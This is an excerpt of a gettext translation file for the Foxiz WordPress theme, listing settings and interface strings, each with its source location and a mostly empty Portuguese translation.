backend/mega-menu.php:121 msgid "Display posts of this category." msgstr "" #: backend/panels/design.php:206 msgid "Display the edit post link for the logged users on the featured image." msgstr "" #: backend/panels/single-post.php:1738 msgid "Display the reading indicator bar at the top site." msgstr "" #: includes/sidebars.php:80 msgid "Display widget ad at the bottom of the website header." msgstr "" #: backend/panels/newsletter.php:104 msgid "Distance of Scroll" msgstr "" #: backend/panels/ads.php:134 backend/panels/ads.php:323 msgid "Do not Override" msgstr "" #: backend/panels/ads.php:45 msgid "Do not place more than one auto ads code in the website." msgstr "" #: templates/parts.php:630 msgid "Dribbble" msgstr "" #: backend/panels/socials.php:110 msgid "Dribbble URL" msgstr "" #: templates/parts.php:175 #, php-format msgid "Dynamic %s pagination" msgstr "" #: backend/panels/amp.php:181 msgid "" "Each AMP page has a 75,000 byte CSS limit, turn off unnecessary section will " "increase the AMP performance." msgstr "" #: backend/panels/amp.php:50 msgid "" "Each AMP page has a 75,000 byte CSS limit. Foxiz will support a compact " "footer to ensure your website will meet with this requirement." msgstr "" #: backend/panels/header.php:128 msgid "" "Each widget is added in \"Appearance >Widgets > More Menu Section\" will be " "corresponding to a column." msgstr "" #: templates/single/templates.php:970 msgid "Edit" msgstr "Editar" #: templates/entry.php:828 msgid "edit" msgstr "editar" #: backend/panels/design.php:205 msgid "Edit Link" msgstr "" #: templates/parts.php:120 msgid "Edit Page" msgstr "" #: backend/panels/design.php:200 backend/panels/design.php:337 msgid "Edit Post Link" msgstr "" #: backend/install-plugins.php:30 msgid "Elementor Website Builder" msgstr "" #: backend/panels/woocommerce.php:172 msgid "Elements Styling" msgstr "" #: backend/panels/optimized.php:195 backend/panels/single-post.php:804 #: backend/panels/single-post.php:943 backend/panels/single-post.php:1081 #: backend/panels/single-post.php:1705 msgid "Email" msgstr "" #: backend/panels/reaction.php:52 msgid "Embarrass" msgstr "" #: backend/category-settings.php:117 backend/category-settings.php:316 #: backend/configs.php:196 backend/configs.php:425 backend/mega-menu.php:131 #: backend/panels/blog-pages.php:325 backend/panels/blog-pages.php:812 #: backend/panels/blog-pages.php:1226 backend/panels/blog-pages.php:1634 #: backend/panels/blog-pages.php:2126 backend/panels/bookmark.php:228 #: backend/panels/bookmark.php:676 backend/panels/login.php:30 #: backend/panels/page.php:86 backend/panels/single-post.php:238 #: backend/panels/single-post.php:453 backend/panels/single-post.php:1179 #: backend/single-metaboxes.php:158 backend/single-metaboxes.php:361 #: backend/single-metaboxes.php:409 backend/single-metaboxes.php:477 #: backend/single-metaboxes.php:616 backend/single-metaboxes.php:654 #: backend/single-metaboxes.php:685 backend/single-metaboxes.php:696 #: backend/single-metaboxes.php:715 backend/single-metaboxes.php:825 #: backend/single-metaboxes.php:844 backend/single-metaboxes.php:863 #: backend/single-metaboxes.php:876 backend/single-metaboxes.php:935 msgid "Enable" msgstr "" #: backend/panels/single-post.php:1225 msgid "Enable for All Posts" msgstr "" #: backend/panels/single-post.php:1224 msgid "Enable for Review Posts" msgstr "" #: backend/panels/header.php:216 msgid "Enable live search result when typing." msgstr "" #: backend/single-metaboxes.php:821 msgid "" "Enable or disable ajax load next posts for this post. This setting will " "override on the global setting." msgstr "" #: backend/panels/single-post.php:1434 msgid "" "Enable or disable ajax load next posts when visitors reached end of the post " "content." msgstr "" #: backend/single-metaboxes.php:405 msgid "Enable or disable autoplay audio for this post." msgstr "" #: backend/panels/design.php:427 msgid "Enable or disable autoplay for the sliders." msgstr "" #: backend/single-metaboxes.php:357 msgid "Enable or disable autoplay video for this post." msgstr "" #: backend/panels/single-post.php:715 backend/panels/single-post.php:854 #: backend/panels/single-post.php:992 backend/panels/single-post.php:1613 msgid "Enable or disable color for social icons." msgstr "" #: backend/panels/single-post.php:480 msgid "Enable or disable entry category info in the single post." msgstr "" #: backend/panels/design.php:454 msgid "Enable or disable free mode when scrolling on the carousels." msgstr "" #: backend/panels/design.php:648 msgid "Enable or disable GIF supported for your website." msgstr "" #: backend/panels/table-contents.php:149 msgid "Enable or disable hierarchy for the table of contents box." msgstr "" #: backend/panels/design.php:492 msgid "Enable or disable icon for the audio post format." msgstr "" #: backend/panels/design.php:485 msgid "Enable or disable icon for the gallery post format." msgstr "" #: backend/panels/design.php:478 msgid "Enable or disable icon for the video post format." msgstr "" #: backend/panels/optimized.php:237 msgid "" "Enable or disable Open Graph (share to social). This option will be " "automatically disabled if you use Yoast SEO." msgstr "" #: backend/panels/optimized.php:75 msgid "Enable or disable preload font icons to increase the site speed score." msgstr "" #: backend/panels/optimized.php:68 msgid "" "Enable or disable preload Google fonts to increase the site speed score." msgstr "" #: backend/panels/single-post.php:276 msgid "" "Enable or disable quick view info bar (review & sponsor meta) at the top of " "the content." msgstr "" #: backend/single-metaboxes.php:871 msgid "" "Enable or disable review markup for this review. This option is useful in " "case you are using 3rd party markup plugin." msgstr "" #: backend/panels/optimized.php:161 msgid "" "Enable or disable review product markup for single post page if you want to " "use 3rd party plugin." msgstr "" #: backend/panels/optimized.php:122 msgid "" "Enable or disable schema markup for the website, helps generate brand " "signals. Disable this option if you want to use 3rd party plugin." msgstr "" #: backend/single-metaboxes.php:859 msgid "" "Enable or disable Schema markup for this article. Disable default schema " "markup for this post if you use a 3rd plugin to create another post type for " "example Recipe, Videos." msgstr "" #: backend/panels/header.php:238 msgid "Enable or disable search icon in the mobile header." msgstr "" #: backend/panels/header.php:245 msgid "Enable or disable search icon the AMP header." msgstr "" #: backend/panels/single-post.php:805 backend/panels/single-post.php:944 #: backend/panels/single-post.php:1082 backend/panels/single-post.php:1706 msgid "Enable or disable share on Email." msgstr "" #: backend/panels/single-post.php:724 backend/panels/single-post.php:863 #: backend/panels/single-post.php:1001 backend/panels/single-post.php:1508 #: backend/panels/single-post.php:1634 msgid "Enable or disable share on Facebook." msgstr "" #: backend/panels/single-post.php:760 backend/panels/single-post.php:899 #: backend/panels/single-post.php:1037 backend/panels/single-post.php:1666 msgid "Enable or disable share on LinkedIn." msgstr "" #: backend/panels/single-post.php:742 backend/panels/single-post.php:881 #: backend/panels/single-post.php:1019 backend/panels/single-post.php:1650 msgid "Enable or disable share on Pinterest." msgstr "" #: backend/panels/single-post.php:778 backend/panels/single-post.php:917 #: backend/panels/single-post.php:1055 backend/panels/single-post.php:1524 #: backend/panels/single-post.php:1682 msgid "Enable or disable share on Reddit." msgstr "" #: backend/panels/single-post.php:984 msgid "Enable or disable share on socials at the fixed left section." msgstr "" #: backend/panels/single-post.php:1605 msgid "Enable or disable share on socials list in this bar." msgstr "" #: backend/panels/single-post.php:796 backend/panels/single-post.php:935 #: backend/panels/single-post.php:1073 backend/panels/single-post.php:1698 msgid "Enable or disable share on Telegram." msgstr "" #: backend/panels/single-post.php:769 backend/panels/single-post.php:908 #: backend/panels/single-post.php:1046 backend/panels/single-post.php:1674 msgid "Enable or disable share on Tumblr." msgstr "" #: backend/panels/single-post.php:733 backend/panels/single-post.php:872 #: backend/panels/single-post.php:1010 backend/panels/single-post.php:1516 #: backend/panels/single-post.php:1642 msgid "Enable or disable share on Twitter." msgstr "" #: backend/panels/single-post.php:787 backend/panels/single-post.php:926 #: backend/panels/single-post.php:1064 backend/panels/single-post.php:1690 msgid "Enable or disable share on Vkontakte." msgstr "" #: backend/panels/single-post.php:751 backend/panels/single-post.php:890 #: backend/panels/single-post.php:1028 backend/panels/single-post.php:1658 msgid "Enable or disable share on WhatsApp." msgstr "" #: backend/panels/table-contents.php:164 msgid "Enable or disable smooth scroll effect to jumb to the anchor link." msgstr "" #: backend/single-metaboxes.php:612 msgid "Enable or disable sponsored content for this post." msgstr "" #: backend/panels/page.php:83 msgid "Enable or disable sticky sidebar feature for the single page." msgstr "" #: backend/panels/single-post.php:450 msgid "" "Enable or disable sticky sidebar feature. This option will only apply to the " "single post." msgstr "" #: backend/panels/blog-pages.php:1631 msgid "" "Enable or disable sticky sidebar feature. This setting applies to the " "archive pages." msgstr "" #: backend/panels/blog-pages.php:1223 msgid "" "Enable or disable sticky sidebar feature. This setting applies to the author " "pages." msgstr "" #: backend/panels/blog-pages.php:809 msgid "" "Enable or disable sticky sidebar feature. This setting applies to the blog " "page." msgstr "" #: backend/panels/blog-pages.php:322 backend/panels/bookmark.php:225 #: backend/panels/bookmark.php:673 msgid "" "Enable or disable sticky sidebar feature. This setting applies to the " "category pages." msgstr "" #: backend/panels/blog-pages.php:2123 backend/panels/blog-pages.php:2343 msgid "" "Enable or disable sticky sidebar feature. This setting applies to the search " "pages." msgstr "" #: backend/panels/single-post.php:1597 msgid "Enable or disable sticky the single post headline (post title)" msgstr "" #: backend/panels/block-classic.php:114 backend/panels/block-grid.php:114 #: backend/panels/block-grid.php:279 backend/panels/block-grid.php:444 #: backend/panels/block-grid.php:617 backend/panels/block-grid.php:804 #: backend/panels/block-list.php:122 backend/panels/block-list.php:295 #: backend/panels/block-list.php:476 backend/panels/block-list.php:671 msgid "Enable or disable the \"sponsored by\" meta." msgstr "" #: backend/panels/adblock.php:20 msgid "Enable or disable the adblock detector." msgstr "" #: backend/single-metaboxes.php:154 backend/single-metaboxes.php:931 msgid "Enable or disable the alert bar below the header." msgstr "" #: backend/panels/header.php:652 msgid "" "Enable or disable the alert bar below the header. This option will be " "overridden by the setting in individual post/page." msgstr "" #: backend/panels/single-post.php:577 msgid "Enable or disable the author avatars before the entry meta bar." msgstr "" #: backend/panels/blog-pages.php:1078 msgid "Enable or disable the author bio in the author pages." msgstr "" #: backend/panels/single-post.php:384 msgid "Enable or disable the author information in the bottom of the content." msgstr "" #: backend/panels/single-post.php:601 msgid "Enable or disable the author job info." msgstr "" #: backend/panels/amp.php:152 backend/panels/general.php:26 msgid "Enable or disable the back to top button." msgstr "" #: backend/panels/bookmark.php:38 msgid "" "Enable or disable the bookmark feature. This is global option and will apply " "to whole the website." msgstr "" #: backend/category-settings.php:390 backend/panels/block-classic.php:82 #: backend/panels/block-grid.php:82 backend/panels/block-grid.php:247 #: backend/panels/block-grid.php:412 backend/panels/block-grid.php:585 #: backend/panels/block-grid.php:772 backend/panels/block-list.php:90 #: backend/panels/block-list.php:263 backend/panels/block-list.php:444 #: backend/panels/block-list.php:639 backend/panels/blog-pages.php:417 #: backend/panels/blog-pages.php:904 backend/panels/blog-pages.php:1318 #: backend/panels/blog-pages.php:1726 backend/panels/blog-pages.php:2218 #: backend/panels/bookmark.php:316 backend/panels/bookmark.php:764 msgid "Enable or disable the bookmark icon." msgstr "" #: backend/single-metaboxes.php:693 msgid "Enable or disable the bottom entry widgets for this post." msgstr "" #: backend/panels/single-post.php:846 msgid "" "Enable or disable the bottom share bar, This section is displayed at below " "of the post content." msgstr "" #: backend/panels/breadcrumb.php:31 msgid "Enable or disable the breadcrumb bar for your website." msgstr "" #: backend/panels/breadcrumb.php:62 msgid "Enable or disable the breadcrumb bar in the single page." msgstr "" #: backend/panels/breadcrumb.php:51 msgid "Enable or disable the breadcrumb bar in the single post." msgstr "" #: backend/panels/breadcrumb.php:95 msgid "Enable or disable the breadcrumb in the archive pages." msgstr "" #: backend/panels/breadcrumb.php:84 msgid "Enable or disable the breadcrumb in the author pages." msgstr "" #: backend/panels/breadcrumb.php:73 msgid "Enable or disable the breadcrumb in the category pages." msgstr "" #: backend/category-settings.php:101 msgid "Enable or disable the breadcrumb in this category header." msgstr "" #: backend/panels/single-post.php:1213 msgid "" "Enable or disable the button show/hide comment box in the single post pages." msgstr "" #: backend/panels/single-post.php:1474 msgid "" "Enable or disable the button show/hide comment box when load next posts." msgstr "" #: backend/panels/single-post.php:953 msgid "Enable or disable the copy post link button." msgstr "" #: backend/panels/single-post.php:814 backend/panels/single-post.php:1091 msgid "Enable or disable the copy post link icon." msgstr "" #: backend/panels/dark-mode.php:29 msgid "Enable or disable the dark mode whole your website." msgstr "" #: backend/panels/optimized.php:153 msgid "" "Enable or disable the default schema markup for single post page if you want " "to use 3rd party plugin." msgstr "" #: backend/panels/amp.php:131 msgid "Enable or disable the footer copyright section." msgstr "" #: backend/panels/ads.php:463 msgid "Enable or disable the footer slide up section." msgstr "" #: backend/panels/single-post.php:1500 msgid "Enable or disable the highlight shares feature." msgstr "" #: backend/panels/design.php:186 msgid "" "Enable or disable the human time format (\"ago\") for the data post entry " "meta." msgstr "" #: backend/panels/single-post.php:639 msgid "Enable or disable the last updated meta info in the single post." msgstr "" #: backend/panels/optimized.php:28 msgid "Enable or disable the lazy load for the featured image." msgstr "" #: backend/category-settings.php:374 backend/panels/block-classic.php:67 #: backend/panels/block-grid.php:67 backend/panels/block-grid.php:232 #: backend/panels/block-grid.php:397 backend/panels/block-grid.php:570 #: backend/panels/block-grid.php:757 backend/panels/block-list.php:75 #: backend/panels/block-list.php:248 backend/panels/block-list.php:429 #: backend/panels/block-list.php:624 backend/panels/blog-pages.php:401 #: backend/panels/blog-pages.php:888 backend/panels/blog-pages.php:1302 #: backend/panels/blog-pages.php:1710 backend/panels/blog-pages.php:2202 #: backend/panels/bookmark.php:300 backend/panels/bookmark.php:748 msgid "Enable or disable the meta description at the end of the review bar." msgstr "" #: backend/panels/header-style.php:30 backend/panels/header-style.php:324 #: backend/panels/header-style.php:575 msgid "Enable or disable the more button at the end of the navigation." msgstr "" #: backend/panels/single-post.php:334 msgid "Enable or disable the newsletter form at bottom entry content." msgstr "" #: backend/panels/single-post.php:393 msgid "" "Enable or disable the next/previous link navigation in single post pages." msgstr "" #: backend/panels/header.php:270 msgid "Enable or disable the notification section on the header." msgstr "" #: backend/panels/table-contents.php:157 msgid "Enable or disable the number list items." msgstr "" #: backend/panels/single-post.php:1395 msgid "Enable or disable the popular section in single post pages." msgstr "" #: backend/panels/newsletter.php:28 msgid "Enable or disable the popup newsletter form." msgstr "" #: backend/panels/bookmark.php:45 msgid "" "Enable or disable the popup notification when users add or remove a post." msgstr "" #: backend/panels/single-post.php:297 msgid "Enable or disable the post tags bar at the bottom of the post content." msgstr "" #: backend/panels/single-post.php:962 backend/panels/single-post.php:1100 #: backend/panels/single-post.php:1714 msgid "Enable or disable the print button." msgstr "" #: backend/panels/single-post.php:823 msgid "Enable or disable the print post button." msgstr "" #: backend/panels/privacy.php:15 msgid "Enable or disable the privacy bar." msgstr "" #: backend/panels/reaction.php:24 msgid "Enable or disable the reaction section at the end of single post pages." msgstr "" #: backend/single-metaboxes.php:840 msgid "Enable or disable the reaction section at the end of this post." msgstr "" #: backend/category-settings.php:426 backend/panels/block-classic.php:107 #: backend/panels/block-grid.php:107 backend/panels/block-grid.php:272 #: backend/panels/block-grid.php:437 backend/panels/block-grid.php:610 #: backend/panels/block-grid.php:797 backend/panels/block-list.php:115 #: backend/panels/block-list.php:288 backend/panels/block-list.php:469 #: backend/panels/block-list.php:664 backend/panels/blog-pages.php:454 #: backend/panels/blog-pages.php:941 backend/panels/blog-pages.php:1355 #: backend/panels/blog-pages.php:1763 backend/panels/blog-pages.php:2255 #: backend/panels/bookmark.php:353 backend/panels/bookmark.php:801 msgid "Enable or disable the read more button." msgstr "" #: backend/panels/single-post.php:1746 msgid "Enable or disable the reading indicator bar." msgstr "" #: backend/panels/single-post.php:668 msgid "Enable or disable the reading time info in the single post." msgstr "" #: backend/panels/single-post.php:1297 msgid "" "Enable or disable the related section at the footer in single post pages." msgstr "" #: backend/panels/woocommerce.php:138 msgid "enable or disable the review box in the single product page." msgstr "" #: backend/single-metaboxes.php:472 msgid "Enable or disable the review feature for this post." msgstr "" #: backend/panels/blog-pages.php:2419 msgid "Enable or disable the search form." msgstr "" #: backend/panels/header.php:196 msgid "Enable or disable the search icon in the header." msgstr "" #: backend/panels/header.php:533 msgid "Enable or disable the sign in button on the header." msgstr "" #: backend/panels/header.php:541 msgid "Enable or disable the sign in button on the mobile header." msgstr "" #: backend/panels/header-style.php:37 backend/panels/header-style.php:331 #: backend/panels/header-style.php:582 msgid "Enable or disable the social icons list at the end of the navigation." msgstr "" #: backend/panels/amp.php:104 backend/panels/footer.php:165 msgid "Enable or disable the social list in this section." msgstr "" #: backend/panels/header.php:374 msgid "Enable or disable the socials list." msgstr "" #: backend/panels/single-post.php:305 msgid "Enable or disable the sources bar at the bottom of the post content." msgstr "" #: backend/panels/header.php:83 msgid "Enable or disable the sticky feature for the main menu bar." msgstr "" #: backend/panels/blog-pages.php:99 msgid "Enable or disable the sub category list in the category header." msgstr "" #: backend/category-settings.php:113 msgid "Enable or disable the sub category list in this category header." msgstr "" #: backend/single-metaboxes.php:711 msgid "Enable or disable the table content for this post." msgstr "" #: backend/panels/table-contents.php:30 msgid "Enable or disable the table of content for the single post." msgstr "" #: backend/panels/table-contents.php:37 msgid "Enable or disable the table of content for the single." msgstr "" #: backend/single-metaboxes.php:920 msgid "Enable or disable the top ad site for this post." msgstr "" #: backend/single-metaboxes.php:682 msgid "Enable or disable the top entry widgets for this post." msgstr "" #: backend/panels/single-post.php:313 msgid "Enable or disable the via bar at the bottom of the post content." msgstr "" #: backend/panels/design.php:363 backend/panels/design.php:371 #: backend/panels/design.php:379 backend/panels/design.php:387 #: backend/panels/design.php:395 msgid "Enable or disable this image crop size." msgstr "" #: backend/panels/general.php:18 msgid "Enable or disable tooltips when hovering on icons." msgstr "" #: backend/panels/single-post.php:707 msgid "" "Enable or disable top share section. This section will display below the " "single entry meta info." msgstr "" #: backend/panels/single-post.php:1220 msgid "" "Enable or disable visitors can rate and review all posts in the comment box." msgstr "" #: backend/panels/single-post.php:1176 msgid "Enable or disable visitors can rate and review on the post review." msgstr "" #: backend/single-metaboxes.php:484 msgid "" "Enable or disable visitors can rate and review this post in the comment box." msgstr "" #: backend/panels/optimized.php:130 msgid "" "Enable or disable website markup, helps to show the Search Box feature for " "brand SERPs and can help your website name to appear in search results." msgstr "" #: backend/panels/sidebar.php:56 msgid "Enable or disable widget block editor (WordPress 5.8 or above)." msgstr "" #: backend/panels/login.php:26 msgid "Enable or disable wp-login.php page style." msgstr "" #: backend/panels/optimized.php:145 msgid "Enable the Carousels (Item List) schema markup for your Homepage." msgstr "" #: backend/panels/optimized.php:83 msgid "Enable this option if all fonts in Typography panels is set." msgstr "" #: backend/panels/single-post.php:489 msgid "" "Enable this option if you would like to only show the primary category in " "the single post." msgstr "" #: backend/panels/bookmark.php:51 backend/panels/table-contents.php:125 msgid "Enable When" msgstr "" #: backend/single-metaboxes.php:489 msgid "Enable with Review" msgstr "" #: backend/panels/single-post.php:1180 msgid "Enable without Post Review" msgstr "" #: backend/panels/header.php:205 msgid "" "Ensure the option \"More Menu - Search Form\" is enabled when you select the " "\"More Menu Triggered\" option." msgstr "" #: backend/panels/header.php:286 msgid "" "Ensure this section set to Light Text if you select a dark sub-menu " "background." msgstr "" #: backend/panels/header.php:327 msgid "" "Ensure you have also set \"Dark Mode Colors\" if you use custom colors for " "the default mode." msgstr "" #: backend/panels/block-classic.php:39 backend/panels/block-grid.php:39 #: backend/panels/block-grid.php:204 backend/panels/block-grid.php:369 #: backend/panels/block-grid.php:542 backend/panels/block-grid.php:729 #: backend/panels/block-list.php:47 backend/panels/block-list.php:220 #: backend/panels/block-list.php:401 backend/panels/block-list.php:596 #: backend/panels/blog-pages.php:364 backend/panels/blog-pages.php:851 #: backend/panels/blog-pages.php:1265 backend/panels/blog-pages.php:1673 #: backend/panels/blog-pages.php:2165 backend/panels/bookmark.php:264 #: backend/panels/bookmark.php:712 backend/panels/design.php:31 #: backend/panels/single-post.php:470 backend/panels/single-post.php:479 #: backend/panels/typography.php:415 msgid "Entry Category" msgstr "" #: backend/category-settings.php:25 msgid "Entry Category Colors" msgstr "" #: backend/panels/typography.php:423 msgid "Entry Category Font" msgstr "" #: backend/panels/single-post.php:497 msgid "Entry Category Font Size" msgstr "" #: backend/panels/typography.php:75 msgid "Entry Excerpt" msgstr "" #: backend/panels/design.php:89 backend/panels/single-post.php:560 #: backend/panels/typography.php:464 msgid "Entry Meta" msgstr "" #: backend/category-settings.php:345 backend/panels/blog-pages.php:374 #: backend/panels/blog-pages.php:861 backend/panels/blog-pages.php:1275 #: backend/panels/blog-pages.php:1683 backend/panels/blog-pages.php:2175 #: backend/panels/bookmark.php:273 backend/panels/bookmark.php:721 msgid "Entry Meta Bar" msgstr "" #: backend/panels/typography.php:472 msgid "Entry Meta Font" msgstr "" #: backend/panels/design.php:98 msgid "Entry Meta Icons" msgstr "" #: backend/panels/single-post.php:570 msgid "Entry Meta Settings" msgstr "" #: backend/category-settings.php:358 backend/panels/block-classic.php:49 #: backend/panels/block-grid.php:49 backend/panels/block-grid.php:214 #: backend/panels/block-grid.php:379 backend/panels/block-grid.php:552 #: backend/panels/block-grid.php:739 backend/panels/block-list.php:57 #: backend/panels/block-list.php:230 backend/panels/block-list.php:411 #: backend/panels/block-list.php:606 backend/panels/blog-pages.php:383 #: backend/panels/blog-pages.php:870 backend/panels/blog-pages.php:1284 #: backend/panels/blog-pages.php:1692 backend/panels/blog-pages.php:2184 #: backend/panels/bookmark.php:282 backend/panels/bookmark.php:730 #: backend/panels/single-post.php:585 msgid "Entry Meta Tags" msgstr "" #: backend/single-metaboxes.php:676 msgid "Entry Widgets" msgstr "" #: backend/category-settings.php:397 backend/panels/blog-pages.php:424 #: backend/panels/blog-pages.php:911 backend/panels/blog-pages.php:1325 #: backend/panels/blog-pages.php:1733 backend/panels/blog-pages.php:2225 #: backend/panels/bookmark.php:323 backend/panels/bookmark.php:771 msgid "Excerpt" msgstr "" #: backend/category-settings.php:408 backend/panels/block-classic.php:90 #: backend/panels/block-grid.php:90 backend/panels/block-grid.php:255 #: backend/panels/block-grid.php:420 backend/panels/block-grid.php:593 #: backend/panels/block-grid.php:780 backend/panels/block-list.php:98 #: backend/panels/block-list.php:271 backend/panels/block-list.php:452 #: backend/panels/block-list.php:647 backend/panels/blog-pages.php:434 #: backend/panels/blog-pages.php:921 backend/panels/blog-pages.php:1335 #: backend/panels/blog-pages.php:1743 backend/panels/blog-pages.php:2235 #: backend/panels/bookmark.php:333 backend/panels/bookmark.php:781 msgid "Excerpt - Max Length" msgstr "" #: backend/category-settings.php:416 backend/panels/block-classic.php:97 #: backend/panels/block-grid.php:97 backend/panels/block-grid.php:262 #: backend/panels/block-grid.php:427 backend/panels/block-grid.php:600 #: backend/panels/block-grid.php:787 backend/panels/block-list.php:105 #: backend/panels/block-list.php:278 backend/panels/block-list.php:459 #: backend/panels/block-list.php:654 backend/panels/blog-pages.php:442 #: backend/panels/blog-pages.php:929 backend/panels/blog-pages.php:1343 #: backend/panels/blog-pages.php:1751 backend/panels/blog-pages.php:2243 #: backend/panels/bookmark.php:341 backend/panels/bookmark.php:789 msgid "Excerpt - Source" msgstr "" #: backend/panels/color.php:123 msgid "Excerpt Color" msgstr "" #: backend/category-settings.php:219 msgid "" "Exclude tag slugs for the latest blog. Separated by commas (for example: " "tagslug1,tagslug2,tagslug3)." msgstr "" #: backend/category-settings.php:218 msgid "Exclude Tags Slug" msgstr "" #: backend/class-tgm-plugin-activation.php:2389 msgid "External Source" msgstr "" #: backend/panels/single-post.php:723 backend/panels/single-post.php:862 #: backend/panels/single-post.php:1000 backend/panels/single-post.php:1633 #: templates/parts.php:591 msgid "Facebook" msgstr "" #: backend/panels/optimized.php:244 msgid "Facebook APP ID" msgstr "" #: backend/panels/optimized.php:253 msgid "Facebook Default Image" msgstr "" #: backend/panels/socials.php:28 msgid "Facebook URL" msgstr "" #: backend/panels/design.php:446 msgid "Fade" msgstr "" #: backend/single-metaboxes.php:667 msgid "Fake View Value" msgstr "" #: backend/panels/design.php:265 msgid "Fallback Meta" msgstr "" #: backend/single-metaboxes.php:251 msgid "Featured Caption" msgstr "" #: backend/single-metaboxes.php:243 msgid "Featured Crop Size" msgstr "" #: backend/panels/design.php:639 msgid "Featured GIF" msgstr "" #: backend/panels/design.php:294 backend/single-metaboxes.php:238 msgid "Featured Image" msgstr "" #: backend/category-settings.php:328 backend/panels/block-classic.php:31 #: backend/panels/block-grid.php:31 backend/panels/block-grid.php:196 #: backend/panels/block-grid.php:361 backend/panels/block-grid.php:534 #: backend/panels/block-grid.php:721 backend/panels/block-list.php:31 #: backend/panels/block-list.php:204 backend/panels/block-list.php:385 #: backend/panels/block-list.php:580 backend/panels/blog-pages.php:349 #: backend/panels/blog-pages.php:836 backend/panels/blog-pages.php:1250 #: backend/panels/blog-pages.php:1658 backend/panels/blog-pages.php:2150 #: backend/panels/bookmark.php:249 backend/panels/bookmark.php:697 msgid "Featured Image Size" msgstr "" #: backend/category-settings.php:86 msgid "Featured Images" msgstr "" #: backend/panels/block-list.php:39 backend/panels/block-list.php:212 #: backend/panels/block-list.php:393 backend/panels/block-list.php:588 msgid "Featured Position" msgstr "" #: backend/single-metaboxes.php:574 msgid "Final Summary" msgstr "" #: templates/blog.php:94 msgid "Find More:" msgstr "Encontrar mais" #: backend/panels/privacy.php:26 msgid "Fixed Bottom" msgstr "" #: backend/panels/amp.php:332 backend/panels/amp.php:392 #: backend/panels/amp.php:452 backend/panels/amp.php:513 #: backend/panels/amp.php:573 msgid "Fixed Height (90px)" msgstr "" #: backend/panels/privacy.php:24 msgid "Fixed Left" msgstr "" #: backend/panels/single-post.php:975 msgid "Fixed Left Area" msgstr "" #: backend/panels/amp.php:186 backend/panels/single-post.php:983 msgid "Fixed Left Share Bar" msgstr "" #: templates/parts.php:612 msgid "Flickr" msgstr "" #: backend/panels/socials.php:74 msgid "Flickr URL" msgstr "" #: backend/panels/ads.php:421 msgid "Float Left" msgstr "" #: backend/panels/ads.php:422 msgid "Float Right" msgstr "" #: backend/panels/single-post.php:82 msgid "Floating Video" msgstr "" #: backend/panels/single-post.php:83 msgid "Floating video on the screen on scroll." msgstr "" #: templates/parts.php:802 msgid "Follow" msgstr "" #: backend/panels/bookmark.php:456 msgid "Follow categories that you're interested in" msgstr "" #: backend/panels/bookmark.php:477 msgid "Follow Page URL" msgstr "" #: templates/footer.php:212 templates/header/templates.php:621 msgid "Follow US" msgstr "Nos siga nas redes sociais" #: templates/blog.php:465 templates/entry.php:1171 msgid "Follow: " msgstr "" #: backend/panels/design.php:704 msgid "Font Awesome" msgstr "" #: backend/panels/typography.php:91 msgid "Font Size" msgstr "" #: backend/panels/footer.php:15 msgid "Footer" msgstr "" #: backend/panels/amp.php:360 msgid "Footer - Ad Type" msgstr "" #: backend/panels/amp.php:388 msgid "Footer - Adsense Size" msgstr "" #: backend/panels/amp.php:400 msgid "Footer - AMP Custom Ad Script" msgstr "" #: includes/sidebars.php:105 msgid "Footer - Column 1" msgstr "" #: includes/sidebars.php:114 msgid "Footer - Column 2" msgstr "" #: includes/sidebars.php:123 msgid "Footer - Column 3" msgstr "" #: includes/sidebars.php:133 msgid "Footer - Column 4" msgstr "" #: includes/sidebars.php:144 msgid "Footer - Column 5" msgstr "" #: backend/panels/amp.php:372 msgid "Footer - Data Ad Client" msgstr "" #: backend/panels/amp.php:380 msgid "Footer - Data Ad Slot" msgstr "" #: includes/sidebars.php:96 msgid "Footer - Top Full Width" msgstr "" #: backend/panels/amp.php:354 msgid "Footer Ad Settings" msgstr "" #: backend/panels/single-post.php:290 msgid "Footer Area" msgstr "" #: backend/panels/footer.php:30 msgid "Footer Background" msgstr "" #: backend/panels/footer.php:136 msgid "Footer Bottom Section" msgstr "" #: backend/panels/header.php:156 backend/panels/header.php:388 msgid "Footer Copyright" msgstr "" #: backend/panels/footer.php:144 msgid "Footer Logo" msgstr "" #: backend/panels/header.php:149 backend/panels/header.php:381 msgid "Footer Menu" msgstr "" #: backend/panels/ads.php:454 msgid "Footer Slide Up" msgstr "" #: backend/panels/ads.php:462 msgid "Footer Slide Up Section" msgstr "" #: backend/panels/footer.php:23 msgid "Footer Style" msgstr "" #: backend/single-metaboxes.php:172 backend/single-metaboxes.php:949 msgid "Footer Template Shortcode" msgstr "" #: backend/panels/newsletter.php:55 msgid "Footer Text" msgstr "" #: backend/panels/newsletter.php:62 msgid "Footer URL" msgstr "" #: backend/panels/heading.php:104 msgid "Footer Widget Heading Layout" msgstr "" #: backend/panels/footer.php:80 msgid "Footer Widget Section" msgstr "" #: backend/panels/footer.php:120 msgid "Footer Widgets - Template Shortcode" msgstr "" #: backend/panels/footer.php:90 msgid "Footer Widgets Layout" msgstr "" #: backend/single-metaboxes.php:490 msgid "Force Enable for This Post" msgstr "" #: backend/panels/optimized.php:90 msgid "Force write Dynamic CSS to file" msgstr "" #: backend/panels/header.php:565 msgid "Form Description" msgstr "" #: backend/panels/header.php:558 msgid "Form Heading" msgstr "" #: backend/panels/header.php:572 msgid "Form Logo" msgstr "" #: backend/category-settings.php:18 msgid "Foxiz - Individual Category Settings" msgstr "" #: backend/install-plugins.php:19 msgid "Foxiz Core" msgstr "" #: backend/theme-options.php:219 msgid "Foxiz Panel" msgstr "" #: backend/install-plugins.php:71 #, php-format msgid "Foxiz recommends the following plugin: %1$s." msgstr "" #: backend/install-plugins.php:70 #, php-format msgid "Foxiz the following plugin: %1$s." msgstr "" #: backend/panels/design.php:318 msgid "From The Center" msgstr "" #: backend/panels/design.php:317 msgid "From The Top" msgstr "" #: backend/panels/ads.php:420 backend/panels/page.php:46 #: backend/panels/single-post.php:174 backend/panels/single-post.php:186 #: backend/single-metaboxes.php:75 msgid "Full Width" msgstr "" #: backend/panels/table-contents.php:116 backend/single-metaboxes.php:729 msgid "Full Width (1 Column)" msgstr "" #: backend/panels/header-style.php:61 backend/panels/header-style.php:355 #: backend/panels/header-style.php:605 msgid "Full Width (100%)" msgstr "" #: backend/panels/table-contents.php:114 backend/single-metaboxes.php:727 msgid "Full Width (2 Columns)" msgstr "" #: backend/panels/typography.php:704 msgid "Full Width Headline" msgstr "" #: backend/panels/typography.php:761 msgid "Full Width Tagline" msgstr "" #: backend/panels/design.php:362 msgid "G1- 330x220" msgstr "" #: backend/panels/design.php:370 msgid "G2 - 420x280" msgstr "" #: 